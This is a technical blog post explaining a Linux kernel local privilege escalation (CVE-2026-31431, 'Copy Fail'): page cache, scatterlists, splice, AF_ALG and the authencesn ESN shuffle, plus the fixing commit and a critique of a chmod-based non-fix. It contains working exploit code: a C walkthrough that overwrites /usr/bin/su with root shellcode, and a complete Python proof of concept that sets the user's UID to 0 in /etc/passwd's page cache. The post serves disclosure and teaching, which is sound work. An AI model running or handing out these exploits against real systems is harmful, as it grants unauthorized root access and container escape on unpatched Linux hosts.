2026-05-03
On April 29, 2026, Theori publicly
disclosed Copy Fail (CVE-2026-31431), a
local privilege escalation affecting every major Linux distribution
shipped since 2017. A logic flaw in the kernel’s authencesn
cryptographic template, chained through AF_ALG sockets and
splice(), gives an unprivileged user a deterministic 4-byte
write into the page cache of any readable file. A 732-byte
Python script corrupts /usr/bin/su in memory and pops a
root shell. No race, no offsets, no compilation.
When I first read the Xint
writeup I immediately thought of Dirty COW (CVE-2016-5195), another
page cache corruption bug that gave root on everything. But the
mechanics are completely different. Dirty COW was a race condition in
the copy-on-write fault handler. Two threads racing
madvise(MADV_DONTNEED) against a write fault could sneak a
write into a read-only mapping. Copy Fail has no race at all, just a
deterministic sequence of syscalls that any unprivileged user can call.
Dirty COW wrote through the virtual memory subsystem, which at least
understands page permissions. Copy Fail writes through the crypto
subsystem, which has no concept of page ownership. It just sees a
scatterlist entry and writes to it.
I also thought this was an out-of-bounds write at first (when I saw “writes 4 bytes past the ciphertext boundary”). It’s not. We’ll get to why, and it’s the reason KASAN never caught it in eight years.
The Xint writeup is well done but moves fast through kernel
internals. Here we go slower, covering page cache, scatterlists,
splice() and AF_ALG/AEAD so you can follow the
full chain even if you’ve never touched kernel MM code. All credit for
the discovery goes to Taeyang Lee, Theori, and the Xint Code Research Team.
Every time we read() a file, the kernel doesn’t go straight to
disk. It goes first to the page cache - a system-wide
in-memory cache of file data, organized by (inode, offset) pairs. If the
page is already cached from a previous read (by any process), the kernel
returns it directly. If not, it reads from disk, caches it, then returns
it.
container 1 container 2 host
+-----------+ +-----------+ +-----------+
| Process A | | Process B | | Process C |
| read() | | execve() | | mmap() |
+-----+-----+ +-----+-----+ +-----+-----+
| | |
+-------------------+-------------------+
|
v
+---------------------------------------------------------+
| Page Cache (RAM) |
| |
| /usr/bin/su +--------+--------+--------+ |
| | page 0 | page 1 | page 2 | |
| | ELF | .text | .data | |
| +--------+--------+--------+ |
+---------------------------+-----------------------------+
^
miss | populate
v
+-------------+
| disk |
| /usr/bin/su |
+-------------+
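To see this in action, here is a quick userspace illustration of mine (not from the writeup) that uses mincore(2) to check how much of a file is resident in the page cache:

/* Sketch: check page cache residency of a file with mincore(2).
 * Illustration only - the file path is arbitrary. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/usr/bin/su", O_RDONLY);
    struct stat st;
    fstat(fd, &st);

    void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    size_t npages = (st.st_size + 4095) / 4096;
    unsigned char *vec = malloc(npages);

    /* The low bit of each vec[i] says: is page i resident in RAM? */
    mincore(map, st.st_size, vec);
    size_t resident = 0;
    for (size_t i = 0; i < npages; i++)
        resident += vec[i] & 1;

    /* On a live system this is often every page already: someone ran su,
     * and the cached pages are shared by all processes and containers. */
    printf("%zu of %zu pages of /usr/bin/su are in the page cache\n",
           resident, npages);
    return 0;
}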
Two structures matter here:
- struct page: represents a single physical page (usually 4096 bytes). Has flags, a mapping pointer (back to the file’s address_space), and an index (the page’s offset within the file in page-sized units).
- struct address_space: associated with an inode. It’s the page cache index for a specific file, a radix tree mapping page offsets to struct page pointers.

The critical property for this vulnerability is that the page cache is shared across the entire system. If two processes in different containers, cgroups, and user namespaces read the same file on the same filesystem, they share the same physical pages. Corrupt a page cache page (yes, that’s how we refer to it: page, page, page…) and every reader sees the corrupted state.
One more thing. The page cache tracks whether a page has been
modified (the “dirty” bit). When a page is dirtied through the normal
write path (write(), mmap store), the kernel
marks it dirty and eventually writes it back to disk. But the corruption
we’re about to see doesn’t go through the normal write path. The page is
never marked dirty and the file on disk is untouched, but every process
that reads it gets the corrupted in-memory version.
The kernel often needs to describe buffers that span multiple
non-contiguous physical pages. A read() might return data
from pages scattered across physical memory. Crypto operations need to
process input spread across different allocations. The
scatterlist is the kernel’s way to represent these
discontiguous buffers.
A single struct scatterlist
entry describes one contiguous chunk:
struct scatterlist {
    unsigned long page_link;   // struct page* | flags in low 2 bits
    unsigned int  offset;      // byte offset within the page
    unsigned int  length;      // byte length of this chunk
    dma_addr_t    dma_address;
};

The page_link field is overloaded. The low 2 bits encode flags:

- Bit 0 (SG_CHAIN): this entry is a pointer to the next scatterlist array. This is how multiple SG (scatter-gather (kernel devs love their two-letter abbreviations: sg, sk, mm, vm)) arrays get chained together.
- Bit 1 (SG_END): this is the last entry in the chain.

The upper bits (after masking off the low 2) store the
struct page* pointer.
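Simplified from include/linux/scatterlist.h (the real header adds debug checks), the flag tests and page accessor look roughly like this:

#define SG_CHAIN 0x01UL
#define SG_END   0x02UL

/* Is this entry a link to another scatterlist array? */
static inline bool sg_is_chain(struct scatterlist *sg)
{
    return sg->page_link & SG_CHAIN;
}

/* Is this the final entry of the chain? */
static inline bool sg_is_last(struct scatterlist *sg)
{
    return sg->page_link & SG_END;
}

/* Mask off the two flag bits to recover the struct page pointer. */
static inline struct page *sg_page(struct scatterlist *sg)
{
    return (struct page *)(sg->page_link & ~(SG_CHAIN | SG_END));
}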
A chain of scatterlists looks like this:
SG Array 1 SG Array 2
+-------------------------+ +-------------------------+
| sg[0]: page_A off=0 | | sg[0]: page_C off=128 |
| len=4096 | | len=64 [END] |
+-------------------------+ +-------------------------+
| sg[1]: page_B off=0 | ^
| len=512 | |
+-------------------------+ |
| sg[2]: CHAIN |----------------+
+-------------------------+
sg_chain()
is the function that creates these links: it sets the
SG_CHAIN bit on the last entry of one array and points it
at the first entry of the next.
To actually read or write data at a byte offset within a scatterlist
chain, the kernel provides scatterwalk_map_and_copy().
It walks the chain entry by entry, skipping pages until it reaches the
target offset, then copies data in or out. This function is the one that
ultimately performs the 4-byte page cache write in this
vulnerability.
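Its signature (paraphrased from include/crypto/scatterwalk.h; details may vary between kernel versions) is simple:

/* Copy nbytes between the linear buffer buf and the scatterlist chain
 * sg, starting at byte offset `start` within the chain.
 * out = 0: chain -> buf (read). out = 1: buf -> chain (write). */
void scatterwalk_map_and_copy(void *buf, struct scatterlist *sg,
                              unsigned int start, unsigned int nbytes,
                              int out);

/* e.g. the pattern we'll meet later: write 4 bytes from tmp into the
 * chain at byte offset assoclen + cryptlen */
scatterwalk_map_and_copy(tmp, dst, assoclen + cryptlen, 4, 1);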
splice(): Zero-Copy I/O

The splice()
system call moves data between a file descriptor and a pipe
without copying through userspace. Instead of
read()-ing file data into a userspace buffer and then
write()-ing it to another fd, splice() passes
page references. The pipe holds pointers to the same
physical pages that live in the page cache.
splice(file_fd, pipe_wr) splice(pipe_rd, socket_fd)
+----------+ +----------+ +----------+
| File |--->| Pipe |--->| Socket |
| (on disk)| | (in mem) | | (AF_ALG) |
+----------+ +----------+ +----------+
| | |
'---------------' |
same physical pages kernel crypto
(page cache pages) receives page cache
page refs in its
scatterlist
When we splice() a file into a pipe, the pipe’s internal
buffer doesn’t get a copy of the data. It gets references to the page
cache pages themselves. Then when we splice() from the pipe
into a socket, the socket’s internal buffers (scatterlists, in the case
of AF_ALG) receive those same page cache page references. No copy at any
step. The kernel’s crypto subsystem is now holding direct pointers to
page cache pages of the file we spliced.
Without splice(), the crypto subsystem would operate on
copied buffers. With splice(), it operates on the page
cache itself. Dirty COW used the same trick of passing page references
around without copying. That one went through the VM fault handler
instead of splice().
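As a self-contained illustration (mine, not part of the PoC), here is a zero-copy "cat" built on the same pattern. Run it with stdout redirected to a file or pipe, since splice() needs a splice-capable destination:

/* Zero-copy file -> pipe -> stdout using splice(2). The pipe holds
 * references to the file's page cache pages; nothing is copied through
 * a userspace buffer. Usage: ./zcat somefile > out */
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    if (argc != 2)
        return 1;
    int fd = open(argv[1], O_RDONLY);
    int p[2];
    pipe(p);

    ssize_t n;
    /* file -> pipe: the pipe buffer now references page cache pages */
    while ((n = splice(fd, NULL, p[1], NULL, 65536, SPLICE_F_MOVE)) > 0) {
        /* pipe -> stdout: still the same pages, still no copy */
        splice(p[0], NULL, STDOUT_FILENO, NULL, n, SPLICE_F_MOVE);
    }
    return 0;
}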
AF_ALG is a Linux socket family that exposes the kernel’s cryptographic API to unprivileged userspace. Any user can:
int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0); // AF_ALG = 38
struct sockaddr_alg sa = {                  // include/uapi/linux/if_alg.h:19
    .salg_family = AF_ALG,
    .salg_type = "aead",
    .salg_name = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

No privileges required. No CAP_NET_ADMIN. The module
auto-loads on first use. AF_ALG was designed so userspace applications
could use hardware-accelerated crypto without writing kernel modules.
Convenient for us too.
AEAD (Authenticated Encryption with Associated Data) is a class of crypto algorithms that provides both confidentiality (encryption) and integrity (authentication tag). The input to an AEAD decryption looks like:
+---------------+--------------------+------------------+
| AAD | Ciphertext | Authentication |
| (auth'd only) | (decrypted+auth'd) | Tag (verified) |
+---------------+--------------------+------------------+
The AAD (Associated Data) is authenticated but not encrypted. It’s plaintext metadata that must not be tampered with. The ciphertext gets decrypted. The authentication tag is verified against both the AAD and ciphertext to detect tampering.
authencesn

authencesn
is a specific AEAD template used for IPsec ESP with Extended
Sequence Numbers (RFC 4303).
Every IPsec packet carries a sequence number to prevent replay attacks. Originally this was a 32-bit counter, but at 10 Gbps line rate a 32-bit counter wraps in a matter of minutes. RFC 4303 introduced Extended Sequence Numbers (ESN), a 64-bit counter split into two halves:
Full 64-bit ESN: [ seqno_hi (32 bits) | seqno_lo (32 bits) ]
upper 32 bits lower 32 bits
Only seqno_lo goes on the wire in the ESP header. The
sender and receiver both maintain a shared counter (the Security
Association state), so seqno_hi is implicit - both sides
know it. This saves 4 bytes per packet on the wire while still getting a
64-bit anti-replay window.
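In code terms, the split is trivial (a sketch, not kernel source):

#include <stdint.h>

uint64_t esn      = 0x0000000200000007ULL; /* full 64-bit sequence number  */
uint32_t seqno_hi = esn >> 32;             /* 0x00000002: implicit, from SA */
uint32_t seqno_lo = (uint32_t)esn;         /* 0x00000007: sent on the wire  */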
The authentication hash needs to cover the full 64-bit
sequence number, including the high bits that aren’t in the
packet. So the kernel has to reconstruct the full ESN before computing
the HMAC. In the real IPsec path (esp_input_set_header()),
the ESP code takes the implicit seqno_hi from the SA
(Security Association) state, pushes
the skb header back by 4 bytes, and stuffs seqno_hi
into the AAD before passing it to authencesn:
ESP header on the wire: [ SPI | seqno_lo | IV | ciphertext | tag ]
^
| only 32 bits
AAD reconstructed for HMAC: [ seqno_hi | seqno_lo | SPI ]
bytes 0-3 bytes 4-7 bytes 8-11
(from SA) (from wire) (from wire)
Now authencesn has the full 64-bit ESN in the first 8
bytes of the AAD. But the HMAC spec for ESP says the hash should be
computed over [SPI | seqno_lo | seqno_hi | ciphertext] - a
different byte order. So authencesn needs to
rearrange these bytes before hashing. It does this by
treating the caller’s destination buffer as scratch space.
In crypto_authenc_esn_decrypt(),
three scatterwalk_map_and_copy()
calls perform the shuffle (source):
Step 1: read tmp[0..1] = dst[0..7] -- grab seqno_hi and seqno_lo
Step 2: write dst[4..7] = tmp[0] (seqno_hi) -- move seqno_hi to bytes 4-7
Step 3: write dst[assoclen+cryptlen] = tmp[1] -- stash seqno_lo PAST the ciphertext
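In code, the shuffle is three scatterwalk calls. This is paraphrased from crypto/authencesn.c (variable names approximate; tmp is a two-element u32 array in the request context):

/* Paraphrase of the ESN shuffle in crypto_authenc_esn_decrypt().
 * dst layout on entry: [ seqno_hi | seqno_lo | SPI | ciphertext | tag ] */
u32 tmp[2];

/* Step 1: read the 8-byte ESN out of dst[0..7] into tmp */
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
/* Step 2: write tmp[0] (seqno_hi) over dst[4..7] */
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
/* Step 3: stash tmp[1] (seqno_lo) right past the ciphertext, at
 * dst[assoclen + cryptlen]. This is the 4-byte write. */
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);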
In the normal IPsec decrypt path,
dst[assoclen + cryptlen] points to the
authentication tag, the HMAC bytes right after the
ciphertext in the AEAD buffer. The tag region is part of the same
kernel-allocated skb buffer, fully writable, about to be overwritten
with the computed HMAC anyway. Stashing seqno_lo there
temporarily is harmless. It’s scratch space that will be consumed by the
HMAC comparison and then discarded:
Normal IPsec dst buffer (single skb allocation):
+----------+--------------+----------+
| AAD | ciphertext | tag | <-- all one contiguous kernel buffer
+----------+--------------+----------+
| | |
| assoclen | cryptlen | authsize |
| ^
| dst[assoclen+cryptlen]
| = start of tag region
| safe to use as scratch
After the HMAC, crypto_authenc_esn_decrypt_tail()
restores the original layout. It reads seqno_lo back from
dst[assoclen+cryptlen] and writes the original 8 bytes back
to dst[0..7]. Clean round-trip, no side effects.
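The restore is the mirror image (again paraphrased from crypto/authencesn.c, names approximate):

/* Paraphrase of the restore in crypto_authenc_esn_decrypt_tail():
 * read both halves back, then rebuild the original dst[0..7]. */
scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);                       /* seqno_hi */
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0); /* seqno_lo */
scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);                       /* dst[0..7] */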
All of this assumes dst is a private, writable
buffer - that dst[assoclen + cryptlen] is safe to
write to because it’s just the tag region of a kernel-owned crypto
buffer. That breaks when someone chains page cache pages into the
destination scatterlist at that exact offset.
In 2017, commit
72548b093ee3 added an optimization to algif_aead.c
- the AF_ALG AEAD interface. The idea was simple. For decryption,
instead of using separate input and output scatterlists, operate
in-place by pointing both req->src and
req->dst to the same scatterlist. This avoids an
allocation and a copy. Makes sense as a performance win.
The AF_ALG socket works like a network socket. Userspace
transmits data into the kernel
(sendmsg/splice) and receives
results back (recvmsg). The kernel uses networking
terminology for the two sides:
- TX SGL: the transmit side, filled by sendmsg() and splice(). When fed via splice(), these scatterlist entries point directly to page cache pages.
- RX SGL: the receive buffer for the recvmsg() side - normal kernel memory, not page cache.

The implementation in _aead_recvmsg():

- chains the TX SGL onto the end of the RX SGL via sg_chain().
- sets req->src = req->dst - both source and destination now point to the same combined scatterlist.

When the data came through splice(), the TX SGL holds
page cache pages. After chaining, those page cache
pages are now part of the destination scatterlist:
req->src --+
|
v
req->dst --> RX Buffer (user memory) TX SGL (page cache pages)
+----------+----------+ +----------------------+
| AAD | CT |--chain-->| Tag pages |
| (copied) | (copied) | | (Page Cache pages!) |
+----------+----------+ +----------------------+
<--- user memory ----> <-- still page cache! ->
The boundary between “safe to write” (user memory in the RX buffer) and “must not write” (page cache pages from splice) is now just an offset within the same scatterlist chain. Any write that walks past the AAD + ciphertext region crosses into page cache territory.
Why Only authencesn Triggers This

The in-place optimization has been there since 2017, and every AEAD
algorithm in the kernel uses the same dst scatterlist. So
why doesn’t every decrypt operation corrupt the page cache?
To answer that, let’s trace what actually writes to dst
during a normal AEAD decrypt. There are three subsystems involved, and
each one stays inside the safe boundary:
1. The HMAC engine (crypto_ahash_digest())
The HMAC computation reads from dst to
hash the AAD and ciphertext. It writes the computed hash into a
separate kernel buffer
(areq_ctx->tail), not back into dst. The
hash output goes into a small buffer allocated as part of the request
context. Even though the HMAC reads across the full
[0 .. assoclen+cryptlen] range of dst, it
never writes a single byte to it.
2. The cipher engine (crypto_skcipher_decrypt())
The actual AES-CBC (or whatever cipher is configured) decryption
writes plaintext to dst, but only within the ciphertext
region, dst[assoclen .. assoclen+cryptlen-authsize]. You
can see the range in authenc.c line 254-255,
skcipher_request_set_crypt(skreq, src, dst, req->cryptlen - authsize, req->iv).
This region was copied from the TX SGL into the RX
buffer. Safe user memory.
3. Tag verification (crypto_authenc_decrypt_tail())
To verify the authentication tag, the kernel reads the tag from
req->src (line
240:
scatterwalk_map_and_copy(ihash, req->src, ...)). It
reads from req->src, not
req->dst. Even with the in-place optimization where
src == dst, this is a read operation (the last argument to
scatterwalk_map_and_copy is 0 = read). The tag
bytes are read into ihash (a local buffer), compared with
the computed HMAC via crypto_memneq, and discarded.
The tag region of dst is never written
to.
Normal AEAD decrypt - who writes where in dst:
+------- RX buffer (user memory) -------+-- chained page cache --+
| AAD | ciphertext | tag pages |
+--------------+------------------------+------------------------+
| | |
HMAC reads cipher WRITES tag READ from src
(no writes) plaintext here into local buffer
(RX buffer, safe) (never written to dst)
The regular authenc (non-ESN) also writes to
dst[assoclen + cryptlen], but only during
encryption (crypto_authenc_genicv(),
line
154), where it copies the computed HMAC tag into the output buffer.
That’s the encrypt path, not decrypt. The in-place optimization with
sg_chain only applies to the decrypt path
in _aead_recvmsg().
The encrypt path uses a different
SGL layout where the RX buffer is large enough to hold AAD +
plaintext + tag, so no page cache pages are chained.
authencesn is the exception. The ESN byte rearrangement
is specific to IPsec Extended Sequence Numbers and no other AEAD
algorithm needs it. That rearrangement uses dst as scratch
space, and step 3 writes 4 bytes at
dst[assoclen + cryptlen] during the
decrypt path. Without the ESN shuffle, the in-place
optimization would be harmless. No subsystem in the normal decrypt
pipeline ever writes to the tag region of dst.
The bug went unnoticed for eight years. The in-place optimization was
tested with authenc, gcm, ccm,
and other AEAD algorithms - all of which only read the tag region during
decrypt. authencesn was the only algorithm that wrote past
the boundary, and nobody connected the two code paths.
Now the two pieces collide. With the in-place optimization,
dst is the combined RX+chained scatterlist - user memory
for AAD and ciphertext, then page cache pages for the tag region.
Let’s be concrete about assoclen and
cryptlen. These are the two parameters that define the AEAD
buffer layout:
- assoclen (associated data length): how many bytes of AAD precede the ciphertext. Set by the attacker via the ALG_SET_AEAD_ASSOCLEN cmsg in sendmsg(). In the PoC this is 8 (for the 8-byte ESN AAD).
- cryptlen (ciphertext length): how many bytes of ciphertext follow the AAD. This is the used parameter in aead_request_set_crypt(). It comes from how much data was sent via sendmsg() + splice(), minus assoclen.

Together they map out the dst scatterlist:
byte offset:
0 assoclen assoclen+cryptlen
| | |
v v v
dst: [ AAD (8 bytes) | ciphertext | tag ... ]
+------------------+----------------+------...--+
|<--- assoclen --->|<-- cryptlen -->|
| |
+---- RX buffer (user memory) ------+-- chained page cache --+
assoclen + cryptlen is the byte offset where the
ciphertext ends and the authentication tag begins. In normal operation,
that’s where the tag lives - safe crypto buffer memory. But with the
in-place optimization, everything past the RX buffer boundary is
page cache pages chained from the TX SGL via
sg_chain(). The offset assoclen + cryptlen
lands right there.
The authencesn ESN shuffle writes seqno_lo
at exactly dst[assoclen + cryptlen] (step 3 above). That
offset walks past the AAD and ciphertext - which live in user memory -
and lands in the chained tag pages, which are page cache pages
from splice:
dst scatterlist (in-place):
+------ RX buffer (user memory) ------+---- chained TX SGL (page cache) ----+
| AAD (8 bytes) | ciphertext (N) | tag pages from splice |
+---------+------+--------------------+-----+--------------------------------+
| |
step 2 writes here (safe) step 3 writes here (Page Cache!)
dst[4..7] = seqno_hi dst[assoclen+cryptlen] = seqno_lo
Why exactly 4 bytes? Because seqno_lo is the low 32 bits
of the 64-bit ESN. 32 bits = 4 bytes. The size of the scratch write is
fixed by the IPsec ESN format.
When I first read the Xint writeup - “writes 4 bytes past the ciphertext boundary” - I immediately classified this as an OOB write in my head. Writing past a boundary? Classic heap overflow, right?
The write at dst[assoclen + cryptlen] is within
bounds of the dst scatterlist. The scatterlist has
valid entries at that offset, the chained tag pages.
scatterwalk_map_and_copy walks the chain, finds a valid
struct scatterlist entry with a valid
struct page pointer and a valid length, maps the page,
writes to it. No bounds check fails. No memory corruption in the heap
sense. No KASAN splat. Everything is “correct”.
The bug is about ownership, not size. The
scatterlist is the right length. The page at that offset is a real,
mapped, valid page. But the page belongs to the page cache, it’s a
cached copy of an on-disk file, and authencesn treats it as
a private scratch buffer. In the normal IPsec path, that offset points
to a kernel-allocated skb page that nobody cares about. With the
in-place optimization and splice(), the same offset now
points to a page cache page that was chained in via
sg_chain().
No buffer overflow. No use-after-free. No type confusion. The write
is architecturally correct. It just writes to a page that was never
supposed to be in that scatterlist position. A logic bug about which
pages end up in dst, not about how many bytes get written.
Dirty COW was invisible to memory sanitizers for the same reason. The
write targets a valid page, just the wrong page. The kernel’s
memory safety tools check sizes and lifetimes, not ownership.
What does the attacker control?

- The value written: tmp[1] is seqno_lo, bytes 4-7 of the AAD. The attacker provides the AAD via sendmsg(). They choose every byte.
- The target page: the page cache of any readable file (whatever gets splice()-d).
- The write offset: controlled via how much data is fed through splice() and the assoclen/cryptlen parameters.

And the write happens before HMAC verification.
crypto_authenc_esn_decrypt() rearranges the ESN first (line
293-295), then computes the HMAC (line
305), then checks it in decrypt_tail(). The HMAC will
fail (the ciphertext is attacker-controlled garbage) and
recvmsg() returns an error. But the 4-byte write into the
page cache is already done.
The public PoC is a 732-byte obfuscated Python script. To make the syscall flow easier to follow, here’s the same logic as readable C. There’s also a full C port by @tgies.
Step 1: Open the AF_ALG socket and bind
authencesn
int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type = "aead",
    .salg_name = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

This creates an AF_ALG
socket and binds it to the authencesn AEAD template. No
privileges needed, the kernel auto-loads algif_aead and
authencesn on first use.
Step 2: Configure the crypto parameters
// Key: rtattr header + enckeylen=16 (big-endian), then 16-byte HMAC key
// + 16-byte AES key. Values don't matter, the HMAC will fail anyway.
uint8_t key[40] = { 0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10 }; // rest zero
setsockopt(alg_fd, SOL_ALG, ALG_SET_KEY, key, sizeof(key));
// Authentication tag size = 4 bytes
setsockopt(alg_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
// accept() gives us the request file descriptor
int req_fd = accept(alg_fd, NULL, NULL);

SOL_ALG = 279. ALG_SET_KEY = 1. ALG_SET_AEAD_AUTHSIZE = 5. The key value is irrelevant, the HMAC computation will fail
regardless, and the page cache corruption happens before
verification.
Step 3: The write4 primitive, one 4-byte page
cache write
This is the core of the exploit. Each call overwrites 4 bytes at a chosen offset in the target file’s page cache:
void write4(int req_fd, int target_fd, off_t offset, uint8_t value[4])
{
    // Build the AAD: 4 garbage bytes + the 4 bytes we want to write.
    // Bytes 4-7 become seqno_lo in authencesn, the value that gets
    // written to dst[assoclen+cryptlen], which is our page cache page.
    uint8_t aad[8] = { 'A','A','A','A', value[0], value[1], value[2], value[3] };

    // cmsg headers tell the kernel: decrypt mode, IV, assoclen = 8
    struct cmsghdr cmsg_iv, cmsg_op, cmsg_assoclen;
    // ALG_SET_IV: 16 zero bytes (AES block size)
    // ALG_SET_OP: ALG_OP_DECRYPT
    // ALG_SET_AEAD_ASSOCLEN: 8 (our AAD is 8 bytes)
    struct msghdr msg = { /* iov = aad, cmsg = above */ };
    sendmsg(req_fd, &msg, MSG_MORE); // send AAD, flag more data coming

    // Now splice the target file's page cache pages into the crypto socket.
    // This is where the page cache pages enter the TX SGL by reference.
    int pipefd[2];
    pipe(pipefd);
    loff_t file_off = 0;
    splice(target_fd, &file_off, pipefd[1], NULL, offset + 4, 0);
    splice(pipefd[0], NULL, req_fd, NULL, offset + 4, 0);

    // recv() triggers the AEAD decrypt in the kernel.
    // authencesn rearranges ESN bytes -> writes seqno_lo to page cache.
    // HMAC fails -> recv returns error, but the 4 bytes are already written.
    char buf[4096];
    recv(req_fd, buf, sizeof(buf), 0); // error expected, we don't care

    close(pipefd[0]);
    close(pipefd[1]);
}

The sendmsg with MSG_MORE sends the AAD (8
bytes) and tells the kernel “more data is coming”. The two
splice calls then feed the target file’s page cache pages
into the socket as ciphertext + tag. When recv triggers the
decrypt, authencesn writes aad[4..7] at
dst[assoclen + cryptlen], which is a page cache page of the
target file.
Step 4: Overwrite the target binary, 4 bytes at a time
int target = open("/usr/bin/su", O_RDONLY);

// payload[] is a small ELF shellcode that calls setuid(0) + execve("/bin/sh")
for (int i = 0; i < payload_len; i += 4) {
    write4(req_fd, target, i, &payload[i]);
}

// The page cache of /usr/bin/su now contains our shellcode.
// Execute it - the kernel loads from the corrupted page cache.
execve("/usr/bin/su", (char*[]){ "su", NULL }, NULL);
// we are root

Each write4 call corrupts 4 bytes of
/usr/bin/su’s page cache. After
payload_len / 4 iterations, the binary’s in-memory image
has been rewritten. execve loads it from the corrupted
cache, not from disk. The shellcode runs as root. Profit! :D
The page cache is per-filesystem, not per-namespace. A container that
mounts the host’s root filesystem (or shares a layer with it) uses the
same physical page cache pages as the host. Corrupt
/usr/bin/su’s page cache from inside a container, and the
host’s su is corrupted too. Container escape for free.
The chmod 4711 Non-Fix

After the disclosure, a “mitigation” started circulating on social media:
for b in passwd chsh chfn mount sudo pkexec; do
    p=$(readlink -f "$(command -v "$b")")
    [ -n "$p" ] && [ "$(stat -c %a "$p")" != "4711" ] && chmod 4711 "$p"
done

It removes the read permission from setuid binaries
(rws--x--x instead of rwsr-xr-x), so
unprivileged users can’t open() them for reading, and
therefore can’t splice() their page cache pages.
This does not work. The vulnerability is a 4-byte write into the page
cache of any readable file, not just setuid binaries.
The original PoC targets /usr/bin/su because it’s a
convenient setuid binary to corrupt and execute. But the primitive is
far more general. As long as you can open(path, O_RDONLY) a
file, you can corrupt its page cache.
/etc/passwd is the obvious alternative target.
World-readable on every Linux system because ls -l,
id, ps, and every program that maps UIDs to
names reads it. The format is trivial, each line is
username:x:uid:gid:.... Overwriting your user’s UID field
from 1000 to 0000 in the page cache makes the
system believe you are root.
I wrote a minimal PoC that does exactly this. Instead of corrupting a
setuid binary, it overwrites the UID field of the attacker’s
/etc/passwd entry:
#!/usr/bin/env python3
## Tested on kernel 6.12.10.
import os, socket, struct
TARGET = "/etc/passwd"
USER = os.environ.get("USER", "user")
with open(TARGET, "rb") as f:
    data = f.read()
# Find the line for our user: "user:x:1000:1000:..."
# The UID is the third field (after the second ':')
prefix = f"{USER}:x:".encode()
idx = data.find(prefix)
uid_offset = idx + len(prefix)
old_uid = data[uid_offset:uid_offset+4]
ALG_SOCK = 38 # AF_ALG
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
alg = socket.socket(ALG_SOCK, socket.SOCK_SEQPACKET, 0)
alg.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# Key format: rtattr header + crypto_authenc_key_param + authkey + enckey
# rtattr { rta_len=8, rta_type=CRYPTO_AUTHENC_KEYA_PARAM(1) }
# crypto_authenc_key_param { enckeylen=16 (AES-128, big-endian) }
# then: 16 bytes HMAC-SHA256 key + 16 bytes AES key (all zeros, value irrelevant)
key = bytes.fromhex('0800010000000010' + '0' * 64)
alg.setsockopt(SOL_ALG, ALG_SET_KEY, key)
alg.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
req, _ = alg.accept()
def write4(fd, offset, value_4bytes):
    aad = b"AAAA" + value_4bytes  # bytes 4-7 of AAD = seqno_lo = the written value
    iv_data = b'\x10' + b'\x00' * 19
    op_data = b'\x00' * 4
    assoc = struct.pack("I", 8)
    req.sendmsg(
        [aad],
        [
            (SOL_ALG, ALG_SET_IV, iv_data),
            (SOL_ALG, ALG_SET_OP, op_data),
            (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, assoc),
        ],
        socket.MSG_MORE
    )
    splice_len = offset + 4
    r, w = os.pipe()
    os.splice(fd, w, splice_len, offset_src=0)
    os.splice(r, req.fileno(), splice_len)
    try:
        req.recv(8 + offset)
    except OSError:
        pass
    os.close(r)
    os.close(w)
target_fd = os.open(TARGET, os.O_RDONLY)
new_uid = b"0000"
write4(target_fd, uid_offset, new_uid)
os.close(target_fd)
import pwd
info = pwd.getpwnam(USER)
if info.pw_uid == 0:
print(f"[+] '{USER}' is now UID 0 in the page cache, just run `su - {USER}`")
else:
print(f"[-] UID is {info.pw_uid}, expected 0")The attack flow is different from the setuid approach but equally effective:
/etc/passwd in the page cache, changing
user:x:1000: to user:x:0000:su - user and enter user’s own
password/etc/shadow (untouched,
password is valid)su calls
setuid(getpwnam("user").pw_uid)getpwnam reads /etc/passwd from the
corrupted page cache and returns UID 0setuid(0) - root shellNo setuid binary was corrupted. No read permission on any setuid
binary was needed. The target was a world-readable text file. The
chmod 4711 “mitigation” changes nothing.
Patch the kernel, disable algif_aead module loading, or
block AF_ALG socket creation via seccomp.
chmod doesn’t help.
Commit
a664bf3d603d reverts the 2017 in-place optimization.
The fix is conceptually simple. Keep source and destination as separate
scatterlists.
Before (vulnerable) - algif_aead.c:282:
// src and dst point to the same scatterlist (in-place)
aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
                       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

Page cache pages from the TX SGL are chained
into the shared src/dst via sg_chain(). The
authencesn scratch write lands on them.
After (fixed):
// src and dst are separate scatterlists (out-of-place)
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

req->src now points to the TX SGL (which may contain
page cache pages from splice). req->dst points to the RX
SGL, a separately allocated buffer for the user’s
recvmsg(). The authencesn scratch write at
dst[assoclen + cryptlen] now hits the RX buffer (harmless
user memory), not page cache pages. The sg_chain() linking
page cache tag pages into a writable destination is gone.
The commit message:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.
Eight years of silent exposure, fixed by removing a performance optimization that had no meaningful benefit. Hmm.
If you can’t patch immediately, block AF_ALG socket
creation:
